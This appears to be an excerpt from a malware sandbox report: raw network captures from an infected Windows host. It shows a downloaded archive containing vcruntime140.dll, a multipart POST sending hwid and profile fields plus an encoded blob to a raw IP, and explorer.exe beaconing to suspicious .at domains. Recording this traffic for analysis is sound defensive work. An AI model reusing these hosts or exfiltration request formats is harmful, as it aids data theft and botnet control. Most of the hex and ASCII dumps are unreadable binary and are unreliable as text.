bc d6 8c 82 77 3c 38 03 b8 79 e0 e6 83 5b 0c 6e 29 b8 2c 70 46 70 f9 e0 56 81 5b 0b ae 1c 5c 05 b8 4d e0 9e 00 b7 05 dc 56 70 db c0 6d 07 b7 03 dc 6e 70 7b c0 ed 05 b7 0f dc 47 e0 0e 80 3b 04 ae 0a dc 51 70 75 e0 4e 80 6b 00 77 0e dc 79 70 17 c1 35 82 bb 02 8e 03 d7 0c ae 05 5c 2b e2 3a 08 da 01 ce 13 9c 12 5c 08 b8 58 70 f3 c1 ad 02 b7 0d dc 01 70 e7 c1 75 80 f3 f1 86 3c e0 16 83 5b 0b 6e 37 b8 2a 70 0d e0 ce 81 bb 08 ae 19 9c 62 30 a5 f0 06 e7 0b 2e 00 9c 01 5c 11 b8 6d e0 aa c0 71 e0 3c 87 40 9f 80 9b 07 6e 15 b8 dd e0 1a c0 35 83 eb 1c c2 d3 32 b9 e0 e1 82 c2 95 05 ca ec 55 99 d9 45 74 6e 61 01 d0 76 59 46 56 8f 70 74 66 66 76 49 89 b2 34 b7 30 3f 03 a3 94 93 94 05 85 ca b9 f3 e6 4d 57 a2 92 Data Ascii: PKnUSKHGvcruntime140.dll@T0aq`FEEoe>U"89)i_YYYiZ?++)^K+4CFJ>g`Py>{A9k'aJLQFQ(/Zy8A}D9[,.\^BQPPH+e+en2vNrEaVdww7_m_Q{VaIa~'OwO4yN_z>Ess3AOQD,d{\#5jd_G_BCDQ.r7t&_X}(J!HJ)QVPB?^EhUK'ge%6Ssz&8u/jrqIq&6O/;0"mGP2xw/EcQC:0E[Q\|('b#PLT\|P1hQc[0C>p,%QF\|P(X_X9>/qR\|l5G>C5DLjG>I0G-{@("X{e<<Dj},(>>D~$gH"6G,3jD~E\7(aPXo_R@&I(GI)SzQPJ.<p4\5Ry7\w<8y[n),pFpV[\MVpmnp{G;QpuNkwyp5\+:\Xppu<[n7*pb0.\mq<@n52UEtnavYFVptffvI40?MW
Jun 29, 2022 23:12:20.368335962 CEST	12302	IN	Data Raw: 1f 89 fd 11 4d d3 d9 2b 8a e8 ec 2c 65 86 92 5e 5d 94 9d 9b a5 2c cc 51 16 30 f9 f9 45 74 b1 b2 a8 30 b7 80 ce 2e 86 9c 31 00 bb 38 3b 23 cb 1e f5 20 58 98 27 6b 75 41 c6 8a dc cc f4 cc 8c 12 1a 23 33 4b 56 34 8a ba d9 8e d8 24 4a e7 67 06 db c3 Data Ascii: M+,e^],Q0Et0.18;# X'kuA#3KV4$JgTKMVP%\xgRT1YbOS-VCL&e">L`3PBAvD=-Ng?^Kf>=\|IUDNO_Q5"\|xe@)>>`
Jun 29, 2022 23:12:20.368355989 CEST	12304	IN	Data Raw: 0f 57 c4 f2 f0 1d 28 84 ff 0b 7f bd fd a9 a0 9e ad 4a aa 0b 1e da bf bb 21 bc 57 88 c3 74 7b 9a cd 86 ab 95 fc 1a 18 96 c9 82 34 d1 03 d2 a2 46 52 3d f0 c3 7c f7 c6 55 40 9c 0a e2 2a 7a 81 8f 69 b2 7b ca 60 5d e3 1d e2 b0 2f 0c 10 ae 53 76 e7 ad Data Ascii: W(J!Wt{4FR=\|U@*zi{`]/Sv+>~Tw>P;qN=gU6Ggw/8<L;ziA';;w6\G,g)\|PE!;x'Nqk1#{hS!z0]tU/p8^
Jun 29, 2022 23:12:20.368371964 CEST	12305	IN	Data Raw: 1b 00 60 3e d1 54 a5 13 6e b4 5d 76 e4 47 ec ed 64 69 0a 2b 62 1f 91 88 8f 54 b6 ad 72 67 a7 4b 59 cf 81 ac cc 4d 7c 52 5c bd c4 81 7b 49 fe c4 c4 14 16 1a 3d 96 e2 64 c3 81 3d a3 14 80 fa 14 36 de 07 50 1d df 26 52 d0 6e 6c 94 37 0b f1 9d d6 a1 Data Ascii: `>Tn]vGdi+bTrgKYM\|R\{I=d=6P&Rnl7N;xw,0h0BjpGPTaZa4QUk\rXY%VV(S3gWx>{8t#!d!s=hC37ecp7Nyr$
Jun 29, 2022 23:12:20.368401051 CEST	12307	IN	Data Raw: 2b af b4 fe 0d c3 f4 49 6e b9 2b e9 6e 03 77 08 24 9e fb 04 1f 1f c0 c3 0c ec f6 16 bc 4d 65 3e d0 6f ad 29 e6 78 4f 26 da c6 b4 58 23 51 2b a7 cb 4a 47 84 a4 79 ca 2b df 00 20 44 8c bc 0d 88 7c 22 00 5c c6 4b 11 97 3f 90 70 9a bc 72 23 e4 01 81 Data Ascii: +In+nw$Me>o)xO&X#Q+JGy+ D\|"\K?pr#"c?]~Eoj(;?t&{;MuA}%h3"T9uC$\^[#R?URQ6x~dERC$f'l$HI#)?g9kd?X4(N![w %t"M
Jun 29, 2022 23:12:20.368422031 CEST	12308	IN	Data Raw: 06 6b 8c 3d 8b 3d 84 a6 07 98 5a e6 84 16 33 d8 0a 75 ac be 05 ec 26 30 33 c1 8a 88 66 f5 cd c4 6a e3 d8 69 12 f1 11 e8 3b 1b c3 d9 fc 0d 1c 75 db 66 e3 6d 91 c1 60 31 c0 90 1d 6f aa 96 90 32 50 16 2c 91 f5 df 59 9d 3e 14 c1 20 02 e6 87 e9 88 c2 Data Ascii: k==Z3u&03fji;ufm`1o2P,Y> i&b^K_fH'=P:g-@(VAHDQy9k80=q^jAI0:T0#X8*+pd[Ms[9x~q&(`9wbL}6\|%e`6
Jun 29, 2022 23:12:20.368443966 CEST	12309	IN	Data Raw: 38 24 6c 03 45 08 2b af 34 81 67 73 b2 8d 3d e5 97 d0 a2 4d 68 96 3f 6e c6 7d 01 67 e8 47 a0 2f 81 a6 51 60 a7 31 43 01 13 c5 e6 38 a0 57 db f9 21 55 6d 0d a3 1a a0 a1 2c d3 fa be c8 3a 16 5e 6c 1c 4f d2 4d 6c 14 18 dc d5 4d 4e 90 ef 74 f9 25 c7 Data Ascii: 8$lE+4gs=Mh?n}gG/Q`1C8W!Um,:^lOMlMNt%PYQOhP&>DA1M[vMhaM%}N^ R(%`bN]i-6F<"I\|l`kH{&+{]oImEWT1'Xl^d}e[pRk:@1JEID
Jun 29, 2022 23:12:20.368464947 CEST	12311	IN	Data Raw: c1 72 02 67 23 2e f0 f2 4c 8b cb a7 ec 49 fe 4b 02 b7 6e 3b c1 4a 26 7c 58 f0 ca 07 a0 4b ee 19 5f f8 e5 56 92 3c 51 21 7c b6 ef 99 0e 29 e3 85 94 9e f9 55 f7 e5 4f e1 16 22 07 b7 08 ea ed ee 4b bc 7a db 6e 57 f2 b8 3d 0b fb 8a 4c a2 1b 47 f0 ca Data Ascii: rg#.LIKn;J&\|XK_V<Q!\|)UO"KznW=LGk<"lK=B9r@[<AX$l^{TVskngZpK%'wa,N@r,p"K[YrhQS.%\l#)5m50qw!$s8Z
Jun 29, 2022 23:12:20.368500948 CEST	12312	IN	Data Raw: 22 ee df 31 70 5f ce 05 3c 37 41 35 c6 a3 43 f1 7b fd 5c 52 12 59 da d3 3a 90 c4 11 45 f5 0a 1f 3f 11 02 01 c8 6d c6 ba a1 38 fd 85 9c 06 2e 6c 26 f6 4c 1d b7 00 ba d9 40 72 bf 0a 0a d9 1a 54 5e 26 a5 68 ef f2 3b 51 cc 80 6e 4a c7 f1 ed b0 7a 27 Data Ascii: "1p_<7A5C{\RY:E?m8.l&L@rT^&h;QnJz'"3M(h3{4p:9}/rvV\="}v-{[Bh^q;cpj*<l~mv\|:W\ q 9yF
Jun 29, 2022 23:12:20.370860100 CEST	12314	IN	Data Raw: 6f 81 31 b6 e2 02 1d 60 ca 3e 8a 7b 39 4d d9 75 50 ec 68 9e c8 70 4c df b9 88 a3 66 60 21 7d 85 01 e2 b8 7d a4 54 85 fa 02 96 db 04 e5 04 86 83 c9 ce cd ae c9 8e fc 30 28 42 5f 79 c5 09 27 41 23 a6 13 cf 10 79 c5 2b d0 bc 78 12 35 8b 44 49 e5 15 Data Ascii: o1`>{9MuPhpLf`!}}T0(B_y'A#y+x5DIsQLU0+e+yZt!N%##V_7?}XW?j*LoV4-{:&lX^sB%\|)cK;s$xYXf9i
Jun 29, 2022 23:12:20.392282009 CEST	12315	IN	Data Raw: b4 19 72 e9 7c 19 ef e8 10 11 3d c0 ae 38 9e e0 9e 47 ad 8f fb e6 75 60 14 fc 4a 84 f3 28 b7 16 8c bf ee d5 19 fe cb a1 7d 85 66 6d 9e 02 77 8a 62 36 bc 67 0f fd f7 2d cf c4 6f 24 cb 33 60 8d ba 18 c8 90 e2 60 20 18 15 80 3b f7 4c 18 a9 29 11 06 Data Ascii: r\|=8Gu`J(}fmwb6g-o$3`` ;L){(aTeZH~mpfvp'af{8!Ns:$o7ej?Sh>t?:Vt$!+*/bMT2pK"`a//
Jun 29, 2022 23:12:26.002223015 CEST	14456	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----5916045669325319 Host: 159.69.101.170 Content-Length: 110196 Connection: Keep-Alive Cache-Control: no-cache
Jun 29, 2022 23:12:26.002316952 CEST	14467	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 39 31 36 30 34 35 36 36 39 33 32 35 33 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 72 6f 66 69 6c 65 22 0d 0a 0d 0a 31 34 31 35 0d 0a 2d 2d Data Ascii: ------5916045669325319Content-Disposition: form-data; name="profile"1415------5916045669325319Content-Disposition: form-data; name="profile_id"1029------5916045669325319Content-Disposition: form-data; name="hwid"d06ed635-
Jun 29, 2022 23:12:26.026504040 CEST	14469	OUT	Data Raw: 34 64 4a 47 36 4b 41 50 30 68 32 45 54 59 7a 56 57 34 74 6f 6f 6d 58 46 4f 35 4d 79 2b 31 2b 54 77 75 41 6e 34 4f 68 38 58 6c 6b 6f 62 42 4b 49 50 70 6b 76 51 46 63 69 6e 2b 39 39 61 6c 2f 52 64 4b 52 53 68 66 68 76 47 4b 6f 49 4d 52 78 42 69 4e Data Ascii: 4dJG6KAP0h2ETYzVW4toomXFO5My+1+TwuAn4Oh8XlkobBKIPpkvQFcin+99al/RdKRShfhvGKoIMRxBiNqAboB4HvCIwn0XljUBbnDw8OJ8ZxwWegCfvPz7lpwtOdziMkDAkYq91gLZRMPqgS0TL5Em0olKssqCST5nXeRoFOO+6ChDsM0qaFoiC60aH/fdbryhSkRP+8iwcl2H8uFpRwxChqEp5KAMivBtUVXaoEeHHnj0kAV
Jun 29, 2022 23:12:26.026823044 CEST	14472	OUT	Data Raw: 44 54 44 44 74 46 6f 66 36 77 67 58 51 62 70 75 4b 6e 49 58 77 67 77 53 2b 65 37 35 64 41 73 51 2b 45 53 6b 69 49 51 5a 63 30 75 55 69 49 31 49 30 4f 70 30 6e 5a 61 69 45 42 68 4b 38 4f 54 75 47 70 54 70 6f 6b 54 65 44 35 50 46 41 47 6a 77 33 4c Data Ascii: DTDDtFof6wgXQbpuKnIXwgwS+e75dAsQ+ESkiIQZc0uUiI1I0Op0nZaiEBhK8OTuGpTpokTeD5PFAGjw3LkYwBWCR77rPE/fQJ1ARAVvx2sgySCal+HyK7gy60jRtYiEVIgBaEz5zTdBs6K+QwZj+51LOQSj51bwn92esjqQ602hl+Pz8LqHiFX9xKan1Ent8t3HWepTdcPUaef8GeDAFsRp0dMxFX+SVdT2FYgxCtTTaYs9SWl
Jun 29, 2022 23:12:26.026866913 CEST	14477	OUT	Data Raw: 4f 54 56 57 6d 6d 37 2b 7a 50 4e 5a 78 57 4c 68 53 69 38 76 47 33 47 32 31 47 54 4d 65 65 45 54 4c 4f 47 75 61 4d 64 43 34 66 64 66 4c 6e 48 47 33 59 70 2f 65 6f 64 6d 69 30 34 6f 52 6f 6e 57 30 33 74 4c 58 6e 59 74 6a 76 42 76 79 7a 7a 44 6a 55 Data Ascii: OTVWmm7+zPNZxWLhSi8vG3G21GTMeeETLOGuaMdC4fdfLnHG3Yp/eodmi04oRonW03tLXnYtjvBvyzzDjU7o4ucEPW43mU97a0J6s9XTeyBs7rn0yufU6LnwtDb3f8VXJWa6fx/VTZq/pGXZegN0YxbOsE8CWRMEvN4hU3XQ0cEZcAyzGH4sUTs6a+7qjqhP25i60t/FEjYhKOd+YDQDdu8VWtDaBf311meq+aeUPrQM9J8B/IG
Jun 29, 2022 23:12:26.026971102 CEST	14482	OUT	Data Raw: 2f 6b 41 79 75 51 31 4a 52 2f 62 61 4d 38 58 6c 53 74 46 74 67 2b 48 55 54 2f 72 75 6d 43 56 54 58 31 36 58 4d 77 42 31 65 33 42 71 43 72 5a 37 57 6e 30 47 69 4a 64 4d 77 4c 4a 71 58 38 6a 4c 75 41 59 38 44 44 72 42 31 74 52 53 56 59 67 77 53 45 Data Ascii: /kAyuQ1JR/baM8XlStFtg+HUT/rumCVTX16XMwB1e3BqCrZ7Wn0GiJdMwLJqX8jLuAY8DDrB1tRSVYgwSEa9LlahYYqqkhnYEva8cZgV3dr5AUtQWOz8a8VfU1cn3lnMSsHBGHul69WPZz1PqKR3t2eZQ31W1bqmalmNjm54zHidAZAzQEW2Vnt93TNa7shOd9CVtzG9b2Njvq6+6ZWt0H7yNqakVIr2KYtcPc+mENIEbil7Boh
Jun 29, 2022 23:12:26.027028084 CEST	14488	OUT	Data Raw: 58 42 4f 75 66 51 38 6a 38 46 38 4a 4e 56 6b 34 68 49 70 43 44 41 59 43 54 54 42 78 45 67 5a 79 59 5a 43 33 46 2f 42 42 6b 44 73 77 55 51 71 32 5a 52 69 6b 54 53 41 76 53 66 38 6d 42 49 38 77 35 48 54 43 64 58 47 45 41 36 52 5a 4f 71 52 5a 68 6e Data Ascii: XBOufQ8j8F8JNVk4hIpCDAYCTTBxEgZyYZC3F/BBkDswUQq2ZRikTSAvSf8mBI8w5HTCdXGEA6RZOqRZhnBWKJpCWEID743NS7ucro/G4/k4Z4tXvo9yZQpWwO9PUobmjioPhzpXCF29U1zAEqQVJyktyaBtkiDEaGqgRUuo2ER7QXG9kescBvIYhIm2IDpiqg63Nmk1RF8FRzJeLEiyIaQKqS5puxJrMINF1aC+IGUEghEg8Gi
Jun 29, 2022 23:12:26.027056932 CEST	14493	OUT	Data Raw: 39 36 75 4f 49 32 32 4b 4b 4f 52 64 6a 77 31 70 75 32 42 59 66 4d 75 31 62 50 4d 48 4f 77 6e 59 42 52 6f 56 48 63 73 67 45 2f 4e 2f 66 77 4c 48 57 44 54 6c 58 61 35 55 4b 54 53 35 6b 6e 58 6e 55 71 68 65 73 72 37 74 2f 50 4f 42 61 31 74 62 74 31 Data Ascii: 96uOI22KKORdjw1pu2BYfMu1bPMHOwnYBRoVHcsgE/N/fwLHWDTlXa5UKTS5knXnUqhesr7t/POBa1tbt1DGpCHq9uopx56sAlb2DLDenJkwqHm/eWzypTzIqatg2oLExu1RwyNFjUbqK2VVPUmWEdoiymQKIdL0bxxu7f25+HLjVll5tY66Ubac5s8Q20tcMFoNn27aWrEzoKkte6n+dZadceORcsrfy3IdG1XdVeGipNwECHW
Jun 29, 2022 23:12:26.051032066 CEST	14506	OUT	Data Raw: 76 6a 6a 30 50 6c 58 41 6e 59 73 4c 36 6f 5a 30 7a 58 64 56 4e 47 62 74 39 4d 6c 33 55 69 6a 52 52 74 53 41 6d 32 6b 5a 34 38 34 41 36 6a 74 54 62 2f 64 41 76 47 58 4d 6a 36 66 57 79 61 73 45 53 64 44 64 74 51 31 5a 6f 37 36 43 4a 43 71 72 50 74 Data Ascii: vjj0PlXAnYsL6oZ0zXdVNGbt9Ml3UijRRtSAm2kZ484A6jtTb/dAvGXMj6fWyasESdDdtQ1Zo76CJCqrPtGSqLeL71ao+SXzMWh9v9jh1PdrkoZv1VENNqrHIDAbrAgGZHDgYcrQjkKpwirIyKP5QolnmjRZYoKe0Fc9dpoDOAYbN+VCEh3IrHaKsByIuUUpwgJY0ixDPgix9jABMAjOpbIwuM6QEkf1lP5+MChhKeQgnd9CszT
Jun 29, 2022 23:12:26.051124096 CEST	14538	OUT	Data Raw: 68 71 76 48 50 52 76 63 32 78 33 42 67 52 72 6e 47 72 2f 45 54 6a 44 46 5a 69 78 66 56 5a 51 42 32 74 66 2b 2f 41 4e 74 53 2b 6d 44 6d 45 4f 51 57 4b 41 57 49 31 31 55 39 53 50 48 33 65 5a 2f 75 55 38 63 6c 39 65 31 47 4c 6c 50 6e 47 33 34 4a 37 Data Ascii: hqvHPRvc2x3BgRrnGr/ETjDFZixfVZQB2tf+/ANtS+mDmEOQWKAWI11U9SPH3eZ/uU8cl9e1GLlPnG34J78bjVvb3ldXkJ1N0d4yxD69HW9usn6kns2vW5nuHqCPoC7d7eg5TlDMc+L/ln9vw0avH2V0ymD1+BLp7cPrziDElpWld7mmzIcyfvPRG0oDbZYk3a3VBylfH261Zozfd008PW6LvohOyGeto+q/PqNynjdbZFRUcYb
Jun 29, 2022 23:12:26.073436022 CEST	14556	OUT	Data Raw: 39 61 42 75 72 59 6b 6b 6e 64 71 42 6c 76 45 76 6e 48 57 57 4f 6b 74 37 48 58 77 75 32 61 72 4f 79 68 2f 79 6b 64 2f 57 4b 56 7a 78 57 4d 31 5a 78 2f 68 64 33 4c 51 44 51 4d 66 47 44 34 5a 51 38 74 31 33 63 5a 2b 62 44 6b 47 70 34 2f 76 56 6a 64 Data Ascii: 9aBurYkkndqBlvEvnHWWOkt7HXwu2arOyh/ykd/WKVzxWM1Zx/hd3LQDQMfGD4ZQ8t13cZ+bDkGp4/vVjdZWcQfmnbis112I5b956sZw3s07T8+SiHgWBGXOCNEDClGZmrm1jSvmdSluviA6FcERsWPzzKavPiAgY4ctn/dXpcrJ6PNOqXqCLM/9IsZTDQ9Bx5YYs1xvAnjGhNqTsee7fUJTTv9czvBofSC+ec5a45R6943jd8e
Jun 29, 2022 23:12:26.629715919 CEST	14613	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 29 Jun 2022 21:12:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49817	175.119.10.231	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 29, 2022 23:12:25.925429106 CEST	14453	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ymjfc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 280 Host: diewebseite.at
Jun 29, 2022 23:12:25.925451040 CEST	14454	OUT	Data Raw: 3b 6e 52 64 f5 c9 60 56 da db c5 76 73 05 73 bd 0d 0e cf e2 1d 71 e2 6a 0b 75 7a e5 49 b4 b4 6b 9f 5a b4 2e 00 6d 2b 1d 9d ea 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1f 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 56 5c c2 96 Data Ascii: ;nRd`VvssqjuzIkZ.m+?*$`7C[zqNA .[k,vuV\PWtyg"ug\+!{zzRR,+\|($N&eS"GUIs'9]KTgrI^QCE9S-"Cb
Jun 29, 2022 23:12:27.169646025 CEST	14697	IN	HTTP/1.0 404 Not Found Date: Wed, 29 Jun 2022 21:12:26 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 8 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 04 00 00 00 72 e8 86 ec Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49756	195.158.3.162	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 29, 2022 23:11:19.427874088 CEST	1324	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cykwgckuqp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: linislominyt11.at
Jun 29, 2022 23:11:19.427916050 CEST	1324	OUT	Data Raw: 4a 9d fe cf 4c 13 55 22 56 0a 27 52 79 db 53 ca 5e 1c e9 67 8b 6d ab da bc 69 a7 8d 70 f5 d4 98 8a ab fa b1 72 31 ee c6 d0 28 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 e6 c6 24 db Data Ascii: JLU"V'RyS^gmipr1(jp_S61oJf=B!bO$h?#SYKu _M\|-U$'Bnr@Wg$KGpU
Jun 29, 2022 23:11:19.963665962 CEST	1325	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cykwgckuqp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: linislominyt11.at Data Raw: 4a 9d fe cf 4c 13 55 22 56 0a 27 52 79 db 53 ca 5e 1c e9 67 8b 6d ab da bc 69 a7 8d 70 f5 d4 98 8a ab fa b1 72 31 ee c6 d0 28 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 e6 c6 24 db f5 df 68 c6 95 ed 3f bf a0 9a cd c1 bd 23 fe 53 59 95 f8 4b 01 94 e9 1a 75 20 93 5f 8f 4d 7c e7 ec 2d d3 0b 03 55 24 a9 1e c2 e7 ae 9b f9 b9 dc 90 1b 27 9f 42 e6 ad f1 f5 96 88 b6 6e 72 40 e4 ad c5 57 cb bb f1 67 24 8d ba e5 aa e3 08 4b 9b ba 85 9c c0 47 1d 00 70 55 f8 ab Data Ascii: JLU"V'RyS^gmipr1(jp_S61oJf=B!bO$h?#SYKu _M\|-U$'Bnr@Wg$KGpU
Jun 29, 2022 23:11:22.387376070 CEST	1326	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:11:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 19 00 00 00 1d 3d 5a e5 71 20 3c 60 7e 45 e7 de bd d8 f7 26 6f 18 c8 43 85 0c 81 a1 55 00 37 ca 03 00 34 6f 8a 38 01 00 00 00 02 00 9c 03 00 00 0b c7 2c d9 be ef eb d2 bd 2e c3 67 08 06 02 00 40 eb c6 2e f0 6e ee d7 e9 bd f9 83 e3 fa 59 39 e6 76 88 b3 a1 01 bf 7d 48 17 e1 72 38 42 66 6e fd db 9f 15 05 ab 70 0b d5 82 12 70 ec e7 c1 ff 16 2a 96 7d 51 48 1f fa dc 42 85 ec 43 68 33 db 77 1e 9a 81 29 70 b3 46 06 9e d1 12 e5 06 3e 74 24 f7 32 37 ee ba 23 ee f5 6b fa 15 25 df 9d 08 31 c3 f6 6e 7e f5 e8 b0 59 f7 78 c7 30 68 85 3b 23 5d 01 09 b8 6e c2 17 d7 33 60 0a 44 17 75 7e 1d 99 98 81 c4 1d 96 cd ff 9e f8 ea 68 1f 79 de e5 d7 07 69 9e cc 31 79 ad 23 2e ad be cb 30 ab 72 a9 fd bb d6 02 59 9c 8d 4d eb 6b 0e cf fe 5e 64 99 f6 34 66 48 3d f7 db ec ea 8a c8 ff 70 a6 cb d4 20 6e 0c 06 d6 a0 00 66 2f c9 4a 1c 54 f7 d9 91 47 37 d3 64 d7 c1 c0 72 f1 05 fd b0 80 3d 13 24 a6 91 f2 1a 01 ce 40 9f ff 96 7f 28 5f fa 98 f2 5b e9 1e c2 1a 23 de bb 50 bc 7c 3d 59 f4 87 43 79 1d 39 c9 7a 61 c9 02 34 15 01 74 7d a9 05 84 bb 61 ce 24 5a ba ec 10 aa 1b d2 c0 09 15 16 f9 9f 57 cc 0e 41 fd a7 12 6b a3 c0 1c 33 ba 1a 5d 3f ac 4d 0a 15 b0 68 2b a1 af c5 fd 75 58 fb 96 a7 88 32 2e fa c8 53 43 96 d9 1c 94 e7 e7 89 44 aa bb 53 50 cb a4 b7 49 c6 9f a4 1f d4 da b3 cb ac 66 84 6f 45 b0 71 fa 9c 7b 5d 83 cb ad 6b 12 db 6e 53 62 1c 71 69 87 b6 43 b4 c9 eb c1 30 85 5b d6 06 3f bf 50 a3 4d eb 4b 22 f7 6a 71 15 37 47 4c ff 29 7f 81 ec d0 04 92 bb fd 3d f7 d9 5c b2 13 60 c7 b2 d4 db e1 60 43 83 27 90 b4 9a 69 ec d8 fd fe 0f 77 ac 28 6b dc 47 8b a5 0f c9 f6 de 42 74 d4 ce 4f 65 3f 31 fe 7e a7 db 55 a4 8f c1 bd 29 5a e3 96 99 24 71 dd 67 7f cf 4e 85 88 08 b0 7d a3 11 c5 33 58 68 96 3a c4 ae 68 f7 db f3 e0 98 ac 93 f8 17 55 8c d0 cd 54 3f 64 70 5c 23 ae b5 39 8f f2 13 23 0b a1 50 b9 8a 34 e5 4a 2e da 9e 1c b4 62 fc 53 d7 03 98 df ef d9 93 f4 26 07 44 37 ad 17 4e 47 5a ec 23 37 56 34 9b 05 0a 67 9a b5 fe 79 c4 ec 97 d1 f8 7e 96 1f c8 a9 f8 3c 17 66 84 2a fc c6 57 50 82 d5 e8 a1 74 bf 71 bf 36 54 94 86 a9 62 40 1d b8 f1 f1 77 aa 36 4b 89 de b7 01 a1 0b d8 7f cd 37 49 8b b1 11 44 0d b6 70 7d dc 33 66 8c ac d5 87 27 bd e6 d8 d2 26 60 17 47 58 3f bc 42 bb 56 3c f9 ce 8b 2a eb 95 78 bd ae db 35 ac 35 d4 bc 24 3a 8a 21 95 db 9e 9a 2d 00 53 6b 8c c5 e4 10 ae 5e f2 06 40 6e 5c 72 aa 78 ea 25 ed 76 40 15 bb 8e 0e 97 6d 57 87 ae f9 32 7f f6 f8 f5 d2 ea 62 b0 bf 0d a0 93 5e a1 e5 c6 61 dd 49 29 77 d2 dd e1 24 96 1d c0 31 b3 99 25 9a 65 af 6f 6b ad 68 ec 4c 33 30 f8 e5 c5 76 45 98 2f a2 ae ab 3d 11 59 6c 44 8d b2 7b f4 67 b9 9b 37 da 06 41 48 04 b0 22 6f 4c 8e 73 38 51 b0 be 92 30 ff a0 26 51 6b 9d d0 df 69 97 46 7d a5 2e 81 e7 61 fa 7c 75 a1 71 3f 7a f0 cb ab ff 70 ad c3 2a 29 db 6f 97 d0 d4 90 61 97 13 f0 7f 9c 83 c7 48 1e ef 26 f1 d4 14 3f 17 26 da f9 60 de ac 18 d5 20 aa 5b 54 47 8f 5f f9 bd 6d cd 7c 9d d3 78 7f 38 6e da ed 6d 1f 99 0f e0 22 92 ee 66 98 f7 72 ab c0 0b 97 d1 ce c9 dd fb 2c e1 31 79 ba 7c 34 a7 5b 0c e4 95 e1 2a a1 87 a2 74 6c 63 03 ba dd 49 d5 13 2f fa 2f 29 0f 98 7f 44 bd cb d0 26 94 b2 09 7e cf d9 3e 48 a1 37 b6 c1 be 15 9d 6d 5a 86 35 a9 3d 95 85 5b af 40 5e fd 10 0c 67 dc 5b b6 92 ad 94 c5 42 e9 a4 61 d0 12 c9 3c 39 f5 71 04 60 45 a8 ca 82 45 59 46 2f 09 7d 48 a3 49 04 0f 63 b1 40 11 d9 bc ee 1a 32 70 75 de 70 7d c2 61 5b 7a 6f f1 de 88 81 b6 53 d0 df c2 70 27 2d 5e 90 cc 9d de 40 22 f1 58 59 5e bb bd 59 a4 8d 4c e0 b7 d1 97 09 97 f2 22 ee 00 fb 91 8b ba d6 4b 81 d9 a5 bf 96 70 55 48 72 2a 05 09 5d 4c 8e ad 71 40 9b ef 4e 37 c3 1f 91 b6 7e 6a 72 5f 1e f2 46 60 6e 70 d1 da 50 3f 04 60 87 fe e6 18 22 84 2f c4 f1 ab a3 3d 3e Data Ascii: =Zq <`~E&oCU74o8,.g@.nY9v}Hr8Bfnpp}QHBCh3w)pF>t$27#k%1n~Yx0h;#]n3`Du~hyi1y#.0rYMk^d4fH=p nf/JTG7dr=$@(_[#P\|=YCy9za4t}a$ZWAk3]?Mh+uX2.SCDSPIfoEq{]knSbqiC0[?PMK"jq7GL)=\``C'iw(kGBtOe?1~U)Z$qgN}3Xh:hUT?dp\#9#P4J.bS&D7NGZ#7V4gy~<fWPtq6Tb@w6K7IDp}3f'&`GX?BV<x55$:!-Sk^@n\rx%v@mW2b^aI)w$1%eokhL30vE/=YlD{g7AH"oLs8Q0&QkiF}.a\|uq?zp)oaH&?&` [TG_m\|x8nm"fr,1y\|4[tlcI//)D&~>H7mZ5=[@^g[Ba<9q`EEYF/}HIc@2pup}a[zoSp'-^@"XY^YL"KpUHr]Lq@N7~jr_F`npP?`"/=>
Jun 29, 2022 23:11:22.411546946 CEST	1327	IN	Data Raw: bf 05 bd 6f e5 36 e2 56 d8 aa 56 30 6f 8b ab df a8 33 8a c2 0c 91 51 13 96 28 18 80 a3 71 92 1a c1 cb 6c 28 f7 f5 75 ca 6a 9e b0 2c 53 86 6f d6 0f dc d1 42 cb 69 c8 88 26 89 dd dd aa b3 a3 49 0f 94 f6 a4 13 63 53 6b e5 d0 71 12 6c 37 36 1a 8e 9a Data Ascii: o6VV0o3Q(ql(uj,SoBi&IcSkql76!%eIAUt6)Dhkz,^,NKOv"4"{p[,-[4JB}j1,@>\|$m$%Qr=nyDe_RB^J!AEAP
